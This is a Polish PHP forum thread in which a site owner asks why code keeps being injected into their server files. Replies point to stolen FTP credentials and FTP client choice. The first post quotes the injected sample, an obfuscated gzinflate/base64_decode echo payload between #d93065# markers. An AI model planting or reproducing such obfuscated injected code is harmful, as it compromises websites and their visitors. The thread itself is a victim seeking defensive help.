Jestem atakowany wirusem

Jestem atakowany wirusem, ktoś atakuje mnie wirusem

qpeace1 Zobacz profil	12.04.2012, 21:13:14 Post #1
Grupa: Zarejestrowani Postów: 19 Pomógł: 0 Dołączył: 1.06.2008 Ostrzeżenie: (0%)	Witam, mam spory problem z jedną stronką którą ktoś od kilku m-cy atakuje wirusami zmieniając pliki na serwerze dopisując kody, jeden z nich to: [PHP] pobierz, plaintext <?php #d93065# echo(gzinflate(base64_decode("tVVNc5swEP0t5WKoBxcJ9MEo6qE59dwj44MHY2czjnGB2pNk8t+7WoFjJ9jNdCYDYlbS6u3b1RO 6acsGdt330qYxM2BjPi0NrMLdommrn9suDJJgGjBsHFsaRNZanUZd8/j8o6431WIbRkWwa+qu7h53VTCf/X4pF115F1br6rBul9Ezoh1gu6wPs2Vd/nmotl20ssUkThm4JgVIDrGGBGQCioHIQSmQOUgGCkck4JNSTwLHYe3s03klgEvQDLIMhHLOqSaDfBKIE VQ7aAyAXtjFAQbok6KlU4i5goHPKyeVvYKgnaAvy898tXDEHRvtSKCB3TG8i4mp3EFjPNcjrphjMkIgpg huJAdOOciMcseXA8NZfCSNujX0oqG5C5K5wIoIMDIpOiMCnIC4Q3Qxcort2WV9pBxL5adxSPrypH38tx6 KUtGs3yY/rTSlKNxXkC11nzR6Mo9LYd1L1cFKIylHVwzlEdRNnD9mJnwsX3vV148d5cEpQ9wNQpK0lB8HkBPnrtBq pNQ4g7swutknXbeIKinyM3axviyfEWkoSgbn3To6B9xX+qJkhJcMo3WU9eihINmP6Ij5zCQJQwzHSgxay vo9OpaUcI7SQzv7HPGdsTqVkPyHfI6n4Y2C4muIF6TlsS6p6xriqew8ir7OYJDkuPMHt+X8tA6b05/G/wB8f77HMD/+e/u8/7Yk+XOSEOGhD9LqZUDnJ3HJjxzjybxI5rN2t4EunMAkMnsbVHu83hbYNoF5wRtrH1XW31rFfm4OdmVaW 8xNY391DWzXZlU3oRFSfLFgYGpZ9HyPVmvbaVMEK8RpsNUPt/i9Wzj7tl7i7Rgeivv5VzbNkqgP82Rb4+OFT5G5+dbfx38B"))); #/d93065# ?> [PHP] pobierz, plaintext wie ktoś o co chodzi i jak mogę się zabezpieczyć? dodam, że zmienne w plikach zabezpieczyłem tak: [PHP] pobierz, plaintext $pobiez_sekcje = mysql_escape_string($_GET['id1']); //jak pobrana zmienna jest liczbą - zabezpieczenie przed zmodyfikowaniem linku o jakieś niedozwolone znaki if (is_numeric($pobiez_sekcje)) { $sekcja = $pobiez_sekcje; [PHP] pobierz, plaintext nie wiem co jeszcze mogę zrobić bardzo proszę o jakiekolwiek wskazówki

Odpowiedzi

maniana Zobacz profil	13.04.2012, 07:49:18 Post #2
Grupa: Zarejestrowani Postów: 207 Pomógł: 44 Dołączył: 18.05.2007 Ostrzeżenie: (0%)	Połączenie może zostać zapamiętane. Ja po zmianie dostępów FTP maiłem (i klient miał) już z tym spokój. Część tego typu syfu instaluje się też poprzez dziury w skryptach ale cześciej takie dziury wykorzystywane są do deface www.

Posty w temacie

qpeace1 Jestem atakowany wirusem 12.04.2012, 21:13:14

tolomei Witaj. Coś podobnego było kiedyś na home.pl. Była... 12.04.2012, 21:17:38

qpeace1 dzięki za pomoc, czyli powinienem się skontaktować... 12.04.2012, 21:30:07

Substr Używasz może Total Commandera? Kiedyś był jakiś wi... 12.04.2012, 21:38:28

qpeace1 używam TC, ale ja nie mam zainfekowanego komputera... 12.04.2012, 21:40:32

tolomei Napisałem abyś poczekał na innych użytkowników któ... 12.04.2012, 21:41:33

Substr Zapoznaj się z wynikami google: https://www.google... 12.04.2012, 22:20:41

maniana Piszę to jako osoba pracująca przy hostingu. W 99%... 13.04.2012, 06:35:22

thek Z tym, że to zawsze wina zapamiętywania hasła nie ... 13.04.2012, 07:19:39

maniana Połączenie może zostać zapamiętane. Ja po zmianie ... 13.04.2012, 07:49:18

Pilsener Najlepiej nie używać popularnych klientów ftp i ni... 13.04.2012, 08:18:03

!*! Zgaduję że te problemy macie korzystając z systemu... 13.04.2012, 10:32:29

prowseed Korzystam z TC, slyszalem o problemie z haslami al... 13.04.2012, 12:04:28

viking Teraz znacznie bardziej popularne jest WinSCP. A w... 13.04.2012, 13:36:47

Niktoś A co myślicie o PUTTY? 13.04.2012, 13:49:15

thek Używam, ale jedynie przy łączeniu z SSH 13.04.2012, 22:40:00

« Następny starszy · PHP · Następny nowszy »

1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych:

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

Aktualny czas: 10.10.2025 - 20:23

Hosting zapewnia

Forum PHP.pl